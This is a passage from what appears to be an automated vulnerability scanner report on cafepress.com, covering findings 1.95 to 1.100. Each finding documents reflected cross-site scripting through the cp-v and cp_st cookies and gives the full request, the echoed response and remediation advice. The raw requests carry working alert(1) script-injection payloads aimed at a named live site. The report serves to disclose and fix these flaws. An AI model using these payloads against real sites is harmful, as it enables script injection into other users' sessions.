HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 51172 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:46:51 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Content-Length: 51172 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe199a"-alert(1)-"33c6f5a13e "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.95. http://www.cafepress.com/cp/viewcart.aspx [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/viewcart.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 197e0</script><script>alert(1)</script>ccc939a9ef5 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/viewcart.aspx?s=search HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=197e0</script><script>alert(1)</script>ccc939a9ef5 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 51195 Date: Sun, 26 Dec 2010 13:46:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:46:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Content-Length: 51195 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... afepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/cp/viewcart.aspx' window.cafepress.tealeaf.searchTerm = '197e0</script><script>alert(1)</script>ccc939a9ef5 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.96. http://www.cafepress.com/make/birth-announcements [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/birth-announcements
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1c6c"-alert(1)-"3104c288fc9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/birth-announcements HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAc1c6c"-alert(1)-"3104c288fc9 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 54488 Date: Sun, 26 Dec 2010 13:48:03 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54488 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc1c6c"-alert(1)-"3104c288fc9 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.97. http://www.cafepress.com/make/birth-announcements [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/birth-announcements
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b100</script><script>alert(1)</script>01efe3e9555 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/birth-announcements HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=7b100</script><script>alert(1)</script>01efe3e9555 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 54510 Date: Sun, 26 Dec 2010 13:48:02 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54510 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '7b100</script><script>alert(1)</script>01efe3e9555 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.98. http://www.cafepress.com/make/custom-baby-gear [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-baby-gear
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505c2"-alert(1)-"362de5625b3 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-baby-gear HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA505c2"-alert(1)-"362de5625b3 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 71179 Date: Sun, 26 Dec 2010 13:48:28 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA505c2"-alert(1)-"362de5625b3 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.99. http://www.cafepress.com/make/custom-baby-gear [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-baby-gear
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8caa8</script><script>alert(1)</script>49b69bc8c1b was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-baby-gear HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=8caa8</script><script>alert(1)</script>49b69bc8c1b ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 71207 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71207 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '8caa8</script><script>alert(1)</script>49b69bc8c1b ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.100. http://www.cafepress.com/make/custom-buttons [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-buttons
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d08c3"-alert(1)-"5c9b7d83b0c was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; 